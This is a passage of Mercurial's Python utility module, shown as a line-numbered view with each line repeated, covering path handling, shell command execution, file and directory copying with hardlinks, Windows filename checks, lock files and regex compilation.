1043 def wrapper(*args, **kwargs):
1043 def wrapper(*args, **kwargs):
1044 gcenabled = gc.isenabled()
1044 gcenabled = gc.isenabled()
1045 gc.disable()
1045 gc.disable()
1046 try:
1046 try:
1047 return func(*args, **kwargs)
1047 return func(*args, **kwargs)
1048 finally:
1048 finally:
1049 if gcenabled:
1049 if gcenabled:
1050 gc.enable()
1050 gc.enable()
1051 return wrapper
1051 return wrapper
1052
1052
1053 if pycompat.ispypy:
1053 if pycompat.ispypy:
1054 # PyPy runs slower with gc disabled
1054 # PyPy runs slower with gc disabled
1055 nogc = lambda x: x
1055 nogc = lambda x: x
1056
1056
1057 def pathto(root, n1, n2):
1057 def pathto(root, n1, n2):
1058 '''return the relative path from one place to another.
1058 '''return the relative path from one place to another.
1059 root should use os.sep to separate directories
1059 root should use os.sep to separate directories
1060 n1 should use os.sep to separate directories
1060 n1 should use os.sep to separate directories
1061 n2 should use "/" to separate directories
1061 n2 should use "/" to separate directories
1062 returns an os.sep-separated path.
1062 returns an os.sep-separated path.
1063
1063
1064 If n1 is a relative path, it's assumed it's
1064 If n1 is a relative path, it's assumed it's
1065 relative to root.
1065 relative to root.
1066 n2 should always be relative to root.
1066 n2 should always be relative to root.
1067 '''
1067 '''
1068 if not n1:
1068 if not n1:
1069 return localpath(n2)
1069 return localpath(n2)
1070 if os.path.isabs(n1):
1070 if os.path.isabs(n1):
1071 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1071 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1072 return os.path.join(root, localpath(n2))
1072 return os.path.join(root, localpath(n2))
1073 n2 = '/'.join((pconvert(root), n2))
1073 n2 = '/'.join((pconvert(root), n2))
1074 a, b = splitpath(n1), n2.split('/')
1074 a, b = splitpath(n1), n2.split('/')
1075 a.reverse()
1075 a.reverse()
1076 b.reverse()
1076 b.reverse()
1077 while a and b and a[-1] == b[-1]:
1077 while a and b and a[-1] == b[-1]:
1078 a.pop()
1078 a.pop()
1079 b.pop()
1079 b.pop()
1080 b.reverse()
1080 b.reverse()
1081 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1081 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1082
1082
1083 def mainfrozen():
1083 def mainfrozen():
1084 """return True if we are a frozen executable.
1084 """return True if we are a frozen executable.
1085
1085
1086 The code supports py2exe (most common, Windows only) and tools/freeze
1086 The code supports py2exe (most common, Windows only) and tools/freeze
1087 (portable, not much used).
1087 (portable, not much used).
1088 """
1088 """
1089 return (safehasattr(sys, "frozen") or # new py2exe
1089 return (safehasattr(sys, "frozen") or # new py2exe
1090 safehasattr(sys, "importers") or # old py2exe
1090 safehasattr(sys, "importers") or # old py2exe
1091 imp.is_frozen(u"__main__")) # tools/freeze
1091 imp.is_frozen(u"__main__")) # tools/freeze
1092
1092
1093 # the location of data files matching the source code
1093 # the location of data files matching the source code
1094 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1094 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1095 # executable version (py2exe) doesn't support __file__
1095 # executable version (py2exe) doesn't support __file__
1096 datapath = os.path.dirname(pycompat.sysexecutable)
1096 datapath = os.path.dirname(pycompat.sysexecutable)
1097 else:
1097 else:
1098 datapath = os.path.dirname(pycompat.fsencode(__file__))
1098 datapath = os.path.dirname(pycompat.fsencode(__file__))
1099
1099
1100 i18n.setdatapath(datapath)
1100 i18n.setdatapath(datapath)
1101
1101
1102 _hgexecutable = None
1102 _hgexecutable = None
1103
1103
1104 def hgexecutable():
1104 def hgexecutable():
1105 """return location of the 'hg' executable.
1105 """return location of the 'hg' executable.
1106
1106
1107 Defaults to $HG or 'hg' in the search path.
1107 Defaults to $HG or 'hg' in the search path.
1108 """
1108 """
1109 if _hgexecutable is None:
1109 if _hgexecutable is None:
1110 hg = encoding.environ.get('HG')
1110 hg = encoding.environ.get('HG')
1111 mainmod = sys.modules[pycompat.sysstr('__main__')]
1111 mainmod = sys.modules[pycompat.sysstr('__main__')]
1112 if hg:
1112 if hg:
1113 _sethgexecutable(hg)
1113 _sethgexecutable(hg)
1114 elif mainfrozen():
1114 elif mainfrozen():
1115 if getattr(sys, 'frozen', None) == 'macosx_app':
1115 if getattr(sys, 'frozen', None) == 'macosx_app':
1116 # Env variable set by py2app
1116 # Env variable set by py2app
1117 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1117 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1118 else:
1118 else:
1119 _sethgexecutable(pycompat.sysexecutable)
1119 _sethgexecutable(pycompat.sysexecutable)
1120 elif (os.path.basename(
1120 elif (os.path.basename(
1121 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1121 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1122 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1122 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1123 else:
1123 else:
1124 exe = findexe('hg') or os.path.basename(sys.argv[0])
1124 exe = findexe('hg') or os.path.basename(sys.argv[0])
1125 _sethgexecutable(exe)
1125 _sethgexecutable(exe)
1126 return _hgexecutable
1126 return _hgexecutable
1127
1127
1128 def _sethgexecutable(path):
1128 def _sethgexecutable(path):
1129 """set location of the 'hg' executable"""
1129 """set location of the 'hg' executable"""
1130 global _hgexecutable
1130 global _hgexecutable
1131 _hgexecutable = path
1131 _hgexecutable = path
1132
1132
1133 def _isstdout(f):
1133 def _isstdout(f):
1134 fileno = getattr(f, 'fileno', None)
1134 fileno = getattr(f, 'fileno', None)
1135 return fileno and fileno() == sys.__stdout__.fileno()
1135 return fileno and fileno() == sys.__stdout__.fileno()
1136
1136
1137 def shellenviron(environ=None):
1137 def shellenviron(environ=None):
1138 """return environ with optional override, useful for shelling out"""
1138 """return environ with optional override, useful for shelling out"""
1139 def py2shell(val):
1139 def py2shell(val):
1140 'convert python object into string that is useful to shell'
1140 'convert python object into string that is useful to shell'
1141 if val is None or val is False:
1141 if val is None or val is False:
1142 return '0'
1142 return '0'
1143 if val is True:
1143 if val is True:
1144 return '1'
1144 return '1'
1145 return str(val)
1145 return str(val)
1146 env = dict(encoding.environ)
1146 env = dict(encoding.environ)
1147 if environ:
1147 if environ:
1148 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1148 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1149 env['HG'] = hgexecutable()
1149 env['HG'] = hgexecutable()
1150 return env
1150 return env
1151
1151
1152 def system(cmd, environ=None, cwd=None, out=None):
1152 def system(cmd, environ=None, cwd=None, out=None):
1153 '''enhanced shell command execution.
1153 '''enhanced shell command execution.
1154 run with environment maybe modified, maybe in different dir.
1154 run with environment maybe modified, maybe in different dir.
1155
1155
1156 if out is specified, it is assumed to be a file-like object that has a
1156 if out is specified, it is assumed to be a file-like object that has a
1157 write() method. stdout and stderr will be redirected to out.'''
1157 write() method. stdout and stderr will be redirected to out.'''
1158 try:
1158 try:
1159 stdout.flush()
1159 stdout.flush()
1160 except Exception:
1160 except Exception:
1161 pass
1161 pass
1162 cmd = quotecommand(cmd)
1162 cmd = quotecommand(cmd)
1163 env = shellenviron(environ)
1163 env = shellenviron(environ)
1164 if out is None or _isstdout(out):
1164 if out is None or _isstdout(out):
1165 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1165 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1166 env=env, cwd=cwd)
1166 env=env, cwd=cwd)
1167 else:
1167 else:
1168 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1168 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1169 env=env, cwd=cwd, stdout=subprocess.PIPE,
1169 env=env, cwd=cwd, stdout=subprocess.PIPE,
1170 stderr=subprocess.STDOUT)
1170 stderr=subprocess.STDOUT)
1171 for line in iter(proc.stdout.readline, ''):
1171 for line in iter(proc.stdout.readline, ''):
1172 out.write(line)
1172 out.write(line)
1173 proc.wait()
1173 proc.wait()
1174 rc = proc.returncode
1174 rc = proc.returncode
1175 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1175 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1176 rc = 0
1176 rc = 0
1177 return rc
1177 return rc
1178
1178
1179 def checksignature(func):
1179 def checksignature(func):
1180 '''wrap a function with code to check for calling errors'''
1180 '''wrap a function with code to check for calling errors'''
1181 def check(*args, **kwargs):
1181 def check(*args, **kwargs):
1182 try:
1182 try:
1183 return func(*args, **kwargs)
1183 return func(*args, **kwargs)
1184 except TypeError:
1184 except TypeError:
1185 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1185 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1186 raise error.SignatureError
1186 raise error.SignatureError
1187 raise
1187 raise
1188
1188
1189 return check
1189 return check
1190
1190
1191 # a whilelist of known filesystems where hardlink works reliably
1191 # a whilelist of known filesystems where hardlink works reliably
1192 _hardlinkfswhitelist = {
1192 _hardlinkfswhitelist = {
1193 'btrfs',
1193 'btrfs',
1194 'ext2',
1194 'ext2',
1195 'ext3',
1195 'ext3',
1196 'ext4',
1196 'ext4',
1197 'hfs',
1197 'hfs',
1198 'jfs',
1198 'jfs',
1199 'reiserfs',
1199 'reiserfs',
1200 'tmpfs',
1200 'tmpfs',
1201 'ufs',
1201 'ufs',
1202 'xfs',
1202 'xfs',
1203 'zfs',
1203 'zfs',
1204 }
1204 }
1205
1205
1206 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1206 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1207 '''copy a file, preserving mode and optionally other stat info like
1207 '''copy a file, preserving mode and optionally other stat info like
1208 atime/mtime
1208 atime/mtime
1209
1209
1210 checkambig argument is used with filestat, and is useful only if
1210 checkambig argument is used with filestat, and is useful only if
1211 destination file is guarded by any lock (e.g. repo.lock or
1211 destination file is guarded by any lock (e.g. repo.lock or
1212 repo.wlock).
1212 repo.wlock).
1213
1213
1214 copystat and checkambig should be exclusive.
1214 copystat and checkambig should be exclusive.
1215 '''
1215 '''
1216 assert not (copystat and checkambig)
1216 assert not (copystat and checkambig)
1217 oldstat = None
1217 oldstat = None
1218 if os.path.lexists(dest):
1218 if os.path.lexists(dest):
1219 if checkambig:
1219 if checkambig:
1220 oldstat = checkambig and filestat.frompath(dest)
1220 oldstat = checkambig and filestat.frompath(dest)
1221 unlink(dest)
1221 unlink(dest)
1222 if hardlink:
1222 if hardlink:
1223 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1223 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1224 # unless we are confident that dest is on a whitelisted filesystem.
1224 # unless we are confident that dest is on a whitelisted filesystem.
1225 try:
1225 try:
1226 fstype = getfstype(os.path.dirname(dest))
1226 fstype = getfstype(os.path.dirname(dest))
1227 except OSError:
1227 except OSError:
1228 fstype = None
1228 fstype = None
1229 if fstype not in _hardlinkfswhitelist:
1229 if fstype not in _hardlinkfswhitelist:
1230 hardlink = False
1230 hardlink = False
1231 if hardlink:
1231 if hardlink:
1232 try:
1232 try:
1233 oslink(src, dest)
1233 oslink(src, dest)
1234 return
1234 return
1235 except (IOError, OSError):
1235 except (IOError, OSError):
1236 pass # fall back to normal copy
1236 pass # fall back to normal copy
1237 if os.path.islink(src):
1237 if os.path.islink(src):
1238 os.symlink(os.readlink(src), dest)
1238 os.symlink(os.readlink(src), dest)
1239 # copytime is ignored for symlinks, but in general copytime isn't needed
1239 # copytime is ignored for symlinks, but in general copytime isn't needed
1240 # for them anyway
1240 # for them anyway
1241 else:
1241 else:
1242 try:
1242 try:
1243 shutil.copyfile(src, dest)
1243 shutil.copyfile(src, dest)
1244 if copystat:
1244 if copystat:
1245 # copystat also copies mode
1245 # copystat also copies mode
1246 shutil.copystat(src, dest)
1246 shutil.copystat(src, dest)
1247 else:
1247 else:
1248 shutil.copymode(src, dest)
1248 shutil.copymode(src, dest)
1249 if oldstat and oldstat.stat:
1249 if oldstat and oldstat.stat:
1250 newstat = filestat.frompath(dest)
1250 newstat = filestat.frompath(dest)
1251 if newstat.isambig(oldstat):
1251 if newstat.isambig(oldstat):
1252 # stat of copied file is ambiguous to original one
1252 # stat of copied file is ambiguous to original one
1253 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1253 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1254 os.utime(dest, (advanced, advanced))
1254 os.utime(dest, (advanced, advanced))
1255 except shutil.Error as inst:
1255 except shutil.Error as inst:
1256 raise Abort(str(inst))
1256 raise Abort(str(inst))
1257
1257
1258 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1258 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1259 """Copy a directory tree using hardlinks if possible."""
1259 """Copy a directory tree using hardlinks if possible."""
1260 num = 0
1260 num = 0
1261
1261
1262 gettopic = lambda: hardlink and _('linking') or _('copying')
1262 gettopic = lambda: hardlink and _('linking') or _('copying')
1263
1263
1264 if os.path.isdir(src):
1264 if os.path.isdir(src):
1265 if hardlink is None:
1265 if hardlink is None:
1266 hardlink = (os.stat(src).st_dev ==
1266 hardlink = (os.stat(src).st_dev ==
1267 os.stat(os.path.dirname(dst)).st_dev)
1267 os.stat(os.path.dirname(dst)).st_dev)
1268 topic = gettopic()
1268 topic = gettopic()
1269 os.mkdir(dst)
1269 os.mkdir(dst)
1270 for name, kind in listdir(src):
1270 for name, kind in listdir(src):
1271 srcname = os.path.join(src, name)
1271 srcname = os.path.join(src, name)
1272 dstname = os.path.join(dst, name)
1272 dstname = os.path.join(dst, name)
1273 def nprog(t, pos):
1273 def nprog(t, pos):
1274 if pos is not None:
1274 if pos is not None:
1275 return progress(t, pos + num)
1275 return progress(t, pos + num)
1276 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1276 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1277 num += n
1277 num += n
1278 else:
1278 else:
1279 if hardlink is None:
1279 if hardlink is None:
1280 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1280 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1281 os.stat(os.path.dirname(dst)).st_dev)
1281 os.stat(os.path.dirname(dst)).st_dev)
1282 topic = gettopic()
1282 topic = gettopic()
1283
1283
1284 if hardlink:
1284 if hardlink:
1285 try:
1285 try:
1286 oslink(src, dst)
1286 oslink(src, dst)
1287 except (IOError, OSError):
1287 except (IOError, OSError):
1288 hardlink = False
1288 hardlink = False
1289 shutil.copy(src, dst)
1289 shutil.copy(src, dst)
1290 else:
1290 else:
1291 shutil.copy(src, dst)
1291 shutil.copy(src, dst)
1292 num += 1
1292 num += 1
1293 progress(topic, num)
1293 progress(topic, num)
1294 progress(topic, None)
1294 progress(topic, None)
1295
1295
1296 return hardlink, num
1296 return hardlink, num
1297
1297
1298 _winreservednames = {
1298 _winreservednames = {
1299 'con', 'prn', 'aux', 'nul',
1299 'con', 'prn', 'aux', 'nul',
1300 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1300 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1301 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1301 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1302 }
1302 }
1303 _winreservedchars = ':*?"<>|'
1303 _winreservedchars = ':*?"<>|'
1304 def checkwinfilename(path):
1304 def checkwinfilename(path):
1305 r'''Check that the base-relative path is a valid filename on Windows.
1305 r'''Check that the base-relative path is a valid filename on Windows.
1306 Returns None if the path is ok, or a UI string describing the problem.
1306 Returns None if the path is ok, or a UI string describing the problem.
1307
1307
1308 >>> checkwinfilename(b"just/a/normal/path")
1308 >>> checkwinfilename(b"just/a/normal/path")
1309 >>> checkwinfilename(b"foo/bar/con.xml")
1309 >>> checkwinfilename(b"foo/bar/con.xml")
1310 "filename contains 'con', which is reserved on Windows"
1310 "filename contains 'con', which is reserved on Windows"
1311 >>> checkwinfilename(b"foo/con.xml/bar")
1311 >>> checkwinfilename(b"foo/con.xml/bar")
1312 "filename contains 'con', which is reserved on Windows"
1312 "filename contains 'con', which is reserved on Windows"
1313 >>> checkwinfilename(b"foo/bar/xml.con")
1313 >>> checkwinfilename(b"foo/bar/xml.con")
1314 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1314 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1315 "filename contains 'AUX', which is reserved on Windows"
1315 "filename contains 'AUX', which is reserved on Windows"
1316 >>> checkwinfilename(b"foo/bar/bla:.txt")
1316 >>> checkwinfilename(b"foo/bar/bla:.txt")
1317 "filename contains ':', which is reserved on Windows"
1317 "filename contains ':', which is reserved on Windows"
1318 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1318 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1319 "filename contains '\\x07', which is invalid on Windows"
1319 "filename contains '\\x07', which is invalid on Windows"
1320 >>> checkwinfilename(b"foo/bar/bla ")
1320 >>> checkwinfilename(b"foo/bar/bla ")
1321 "filename ends with ' ', which is not allowed on Windows"
1321 "filename ends with ' ', which is not allowed on Windows"
1322 >>> checkwinfilename(b"../bar")
1322 >>> checkwinfilename(b"../bar")
1323 >>> checkwinfilename(b"foo\\")
1323 >>> checkwinfilename(b"foo\\")
1324 "filename ends with '\\', which is invalid on Windows"
1324 "filename ends with '\\', which is invalid on Windows"
1325 >>> checkwinfilename(b"foo\\/bar")
1325 >>> checkwinfilename(b"foo\\/bar")
1326 "directory name ends with '\\', which is invalid on Windows"
1326 "directory name ends with '\\', which is invalid on Windows"
1327 '''
1327 '''
1328 if path.endswith('\\'):
1328 if path.endswith('\\'):
1329 return _("filename ends with '\\', which is invalid on Windows")
1329 return _("filename ends with '\\', which is invalid on Windows")
1330 if '\\/' in path:
1330 if '\\/' in path:
1331 return _("directory name ends with '\\', which is invalid on Windows")
1331 return _("directory name ends with '\\', which is invalid on Windows")
1332 for n in path.replace('\\', '/').split('/'):
1332 for n in path.replace('\\', '/').split('/'):
1333 if not n:
1333 if not n:
1334 continue
1334 continue
1335 for c in _filenamebytestr(n):
1335 for c in _filenamebytestr(n):
1336 if c in _winreservedchars:
1336 if c in _winreservedchars:
1337 return _("filename contains '%s', which is reserved "
1337 return _("filename contains '%s', which is reserved "
1338 "on Windows") % c
1338 "on Windows") % c
1339 if ord(c) <= 31:
1339 if ord(c) <= 31:
1340 return _("filename contains '%s', which is invalid "
1340 return _("filename contains '%s', which is invalid "
1341 "on Windows") % escapestr(c)
1341 "on Windows") % escapestr(c)
1342 base = n.split('.')[0]
1342 base = n.split('.')[0]
1343 if base and base.lower() in _winreservednames:
1343 if base and base.lower() in _winreservednames:
1344 return _("filename contains '%s', which is reserved "
1344 return _("filename contains '%s', which is reserved "
1345 "on Windows") % base
1345 "on Windows") % base
1346 t = n[-1:]
1346 t = n[-1:]
1347 if t in '. ' and n not in '..':
1347 if t in '. ' and n not in '..':
1348 return _("filename ends with '%s', which is not allowed "
1348 return _("filename ends with '%s', which is not allowed "
1349 "on Windows") % t
1349 "on Windows") % t
1350
1350
1351 if pycompat.iswindows:
1351 if pycompat.iswindows:
1352 checkosfilename = checkwinfilename
1352 checkosfilename = checkwinfilename
1353 timer = time.clock
1353 timer = time.clock
1354 else:
1354 else:
1355 checkosfilename = platform.checkosfilename
1355 checkosfilename = platform.checkosfilename
1356 timer = time.time
1356 timer = time.time
1357
1357
1358 if safehasattr(time, "perf_counter"):
1358 if safehasattr(time, "perf_counter"):
1359 timer = time.perf_counter
1359 timer = time.perf_counter
1360
1360
1361 def makelock(info, pathname):
1361 def makelock(info, pathname):
1362 try:
1362 try:
1363 return os.symlink(info, pathname)
1363 return os.symlink(info, pathname)
1364 except OSError as why:
1364 except OSError as why:
1365 if why.errno == errno.EEXIST:
1365 if why.errno == errno.EEXIST:
1366 raise
1366 raise
1367 except AttributeError: # no symlink in os
1367 except AttributeError: # no symlink in os
1368 pass
1368 pass
1369
1369
1370 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1370 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1371 os.write(ld, info)
1371 os.write(ld, info)
1372 os.close(ld)
1372 os.close(ld)
1373
1373
1374 def readlock(pathname):
1374 def readlock(pathname):
1375 try:
1375 try:
1376 return os.readlink(pathname)
1376 return os.readlink(pathname)
1377 except OSError as why:
1377 except OSError as why:
1378 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1378 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1379 raise
1379 raise
1380 except AttributeError: # no symlink in os
1380 except AttributeError: # no symlink in os
1381 pass
1381 pass
1382 fp = posixfile(pathname)
1382 fp = posixfile(pathname)
1383 r = fp.read()
1383 r = fp.read()
1384 fp.close()
1384 fp.close()
1385 return r
1385 return r
1386
1386
1387 def fstat(fp):
1387 def fstat(fp):
1388 '''stat file object that may not have fileno method.'''
1388 '''stat file object that may not have fileno method.'''
1389 try:
1389 try:
1390 return os.fstat(fp.fileno())
1390 return os.fstat(fp.fileno())
1391 except AttributeError:
1391 except AttributeError:
1392 return os.stat(fp.name)
1392 return os.stat(fp.name)
1393
1393
1394 # File system features
1394 # File system features
1395
1395
1396 def fscasesensitive(path):
1396 def fscasesensitive(path):
1397 """
1397 """
1398 Return true if the given path is on a case-sensitive filesystem
1398 Return true if the given path is on a case-sensitive filesystem
1399
1399
1400 Requires a path (like /foo/.hg) ending with a foldable final
1400 Requires a path (like /foo/.hg) ending with a foldable final
1401 directory component.
1401 directory component.
1402 """
1402 """
1403 s1 = os.lstat(path)
1403 s1 = os.lstat(path)
1404 d, b = os.path.split(path)
1404 d, b = os.path.split(path)
1405 b2 = b.upper()
1405 b2 = b.upper()
1406 if b == b2:
1406 if b == b2:
1407 b2 = b.lower()
1407 b2 = b.lower()
1408 if b == b2:
1408 if b == b2:
1409 return True # no evidence against case sensitivity
1409 return True # no evidence against case sensitivity
1410 p2 = os.path.join(d, b2)
1410 p2 = os.path.join(d, b2)
1411 try:
1411 try:
1412 s2 = os.lstat(p2)
1412 s2 = os.lstat(p2)
1413 if s2 == s1:
1413 if s2 == s1:
1414 return False
1414 return False
1415 return True
1415 return True
1416 except OSError:
1416 except OSError:
1417 return True
1417 return True
1418
1418
1419 try:
1419 try:
1420 import re2
1420 import re2
1421 _re2 = None
1421 _re2 = None
1422 except ImportError:
1422 except ImportError:
1423 _re2 = False
1423 _re2 = False
1424
1424
1425 class _re(object):
1425 class _re(object):
1426 def _checkre2(self):
1426 def _checkre2(self):
1427 global _re2
1427 global _re2
1428 try:
1428 try:
1429 # check if match works, see issue3964
1429 # check if match works, see issue3964
1430 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1430 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1431 except ImportError:
1431 except ImportError:
1432 _re2 = False
1432 _re2 = False
1433
1433
1434 def compile(self, pat, flags=0):
1434 def compile(self, pat, flags=0):
1435 '''Compile a regular expression, using re2 if possible
1435 '''Compile a regular expression, using re2 if possible
1436
1436
1437 For best performance, use only re2-compatible regexp features. The
1437 For best performance, use only re2-compatible regexp features. The
1438 only flags from the re module that are re2-compatible are
1438 only flags from the re module that are re2-compatible are
1439 IGNORECASE and MULTILINE.'''
1439 IGNORECASE and MULTILINE.'''
1440 if _re2 is None:
1440 if _re2 is None:
1441 self._checkre2()
1441 self._checkre2()
1442 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1442 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1443 if flags & remod.IGNORECASE:
1443 if flags & remod.IGNORECASE:
1444 pat = '(?i)' + pat
1444 pat = '(?i)' + pat
1445 if flags & remod.MULTILINE:
1445 if flags & remod.MULTILINE:
1446 pat = '(?m)' + pat
1446 pat = '(?m)' + pat
1447 try:
1447 try:
1448 return re2.compile(pat)
1448 return re2.compile(pat)
1449 except re2.error:
1449 except re2.error:
1450 pass
1450 pass
1451 return remod.compile(pat, flags)
1451 return remod.compile(pat, flags)
1452
1452
1453 @propertycache
1453 @propertycache
1454 def escape(self):
1454 def escape(self):
1455 '''Return the version of escape corresponding to self.compile.
1455 '''Return the version of escape corresponding to self.compile.
1456
1456
1457 This is imperfect because whether re2 or re is used for a particular
1457 This is imperfect because whether re2 or re is used for a particular
1458 function depends on the flags, etc, but it's the best we can do.
1458 function depends on the flags, etc, but it's the best we can do.
1459 '''
1459 '''
1460 global _re2
1460 global _re2
1461 if _re2 is None:
1461 if _re2 is None:
1462 self._checkre2()
1462 self._checkre2()
1463 if _re2:
1463 if _re2:
1464 return re2.escape
1464 return re2.escape
1465 else:
1465 else:
1466 return remod.escape
1466 return remod.escape
1467
1467
1468 re = _re()
1468 re = _re()
1469
1469
1470 _fspathcache = {}
1470 _fspathcache = {}
1471 def fspath(name, root):
1471 def fspath(name, root):
1472 '''Get name in the case stored in the filesystem
1472 '''Get name in the case stored in the filesystem
1473
1473
1474 The name should be relative to root, and be normcase-ed for efficiency.
1474 The name should be relative to root, and be normcase-ed for efficiency.
1475
1475
1476 Note that this function is unnecessary, and should not be
1476 Note that this function is unnecessary, and should not be
1477 called, for case-sensitive filesystems (simply because it's expensive).
1477 called, for case-sensitive filesystems (simply because it's expensive).
1478
1478
1479 The root should be normcase-ed, too.
1479 The root should be normcase-ed, too.
1480 '''
1480 '''
1481 def _makefspathcacheentry(dir):
1481 def _makefspathcacheentry(dir):
1482 return dict((normcase(n), n) for n in os.listdir(dir))
1482 return dict((normcase(n), n) for n in os.listdir(dir))
1483
1483
1484 seps = pycompat.ossep
1484 seps = pycompat.ossep
1485 if pycompat.osaltsep:
1485 if pycompat.osaltsep:
1486 seps = seps + pycompat.osaltsep
1486 seps = seps + pycompat.osaltsep
1487 # Protect backslashes. This gets silly very quickly.
1487 # Protect backslashes. This gets silly very quickly.
1488 seps.replace('\\','\\\\')
1488 seps.replace('\\','\\\\')
1489 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1489 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1490 dir = os.path.normpath(root)
1490 dir = os.path.normpath(root)
1491 result = []
1491 result = []
1492 for part, sep in pattern.findall(name):
1492 for part, sep in pattern.findall(name):
1493 if sep:
1493 if sep:
1494 result.append(sep)
1494 result.append(sep)
1495 continue
1495 continue
1496
1496
1497 if dir not in _fspathcache:
1497 if dir not in _fspathcache:
1498 _fspathcache[dir] = _makefspathcacheentry(dir)
1498 _fspathcache[dir] = _makefspathcacheentry(dir)
1499 contents = _fspathcache[dir]
1499 contents = _fspathcache[dir]
1500
1500
1501 found = contents.get(part)
1501 found = contents.get(part)
1502 if not found:
1502 if not found:
1503 # retry "once per directory" per "dirstate.walk" which
1503 # retry "once per directory" per "dirstate.walk" which
1504 # may take place for each patches of "hg qpush", for example
1504 # may take place for each patches of "hg qpush", for example
1505 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1505 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1506 found = contents.get(part)
1506 found = contents.get(part)
1507
1507
1508 result.append(found or part)
1508 result.append(found or part)
1509 dir = os.path.join(dir, part)
1509 dir = os.path.join(dir, part)
1510
1510
1511 return ''.join(result)
1511 return ''.join(result)
1512
1512
1513 def getfstype(dirpath):
1513 def getfstype(dirpath):
1514 '''Get the filesystem type name from a directory (best-effort)
1514 '''Get the filesystem type name from a directory (best-effort)
1515
1515
1516 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1516 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1517 '''
1517 '''
1518 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1518 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1519
1519
1520 def checknlink(testfile):
1520 def checknlink(testfile):
1521 '''check whether hardlink count reporting works properly'''
1521 '''check whether hardlink count reporting works properly'''
1522
1522
1523 # testfile may be open, so we need a separate file for checking to
1523 # testfile may be open, so we need a separate file for checking to
1524 # work around issue2543 (or testfile may get lost on Samba shares)
1524 # work around issue2543 (or testfile may get lost on Samba shares)
1525 f1, f2, fp = None, None, None
1525 f1, f2, fp = None, None, None
1526 try:
1526 try:
1527 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1527 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1528 suffix='1~', dir=os.path.dirname(testfile))
1528 suffix='1~', dir=os.path.dirname(testfile))
1529 os.close(fd)
1529 os.close(fd)
1530 f2 = '%s2~' % f1[:-2]
1530 f2 = '%s2~' % f1[:-2]
1531
1531
1532 oslink(f1, f2)
1532 oslink(f1, f2)
1533 # nlinks() may behave differently for files on Windows shares if
1533 # nlinks() may behave differently for files on Windows shares if
1534 # the file is open.
1534 # the file is open.
1535 fp = posixfile(f2)
1535 fp = posixfile(f2)
1536 return nlinks(f2) > 1
1536 return nlinks(f2) > 1
1537 except OSError:
1537 except OSError:
1538 return False
1538 return False
1539 finally:
1539 finally:
1540 if fp is not None:
1540 if fp is not None:
1541 fp.close()
1541 fp.close()
1542 for f in (f1, f2):
1542 for f in (f1, f2):
1543 try:
1543 try:
1544 if f is not None:
1544 if f is not None:
1545 os.unlink(f)
1545 os.unlink(f)
1546 except OSError:
1546 except OSError:
1547 pass
1547 pass
1548
1548
1549 def endswithsep(path):
1549 def endswithsep(path):
1550 '''Check path ends with os.sep or os.altsep.'''
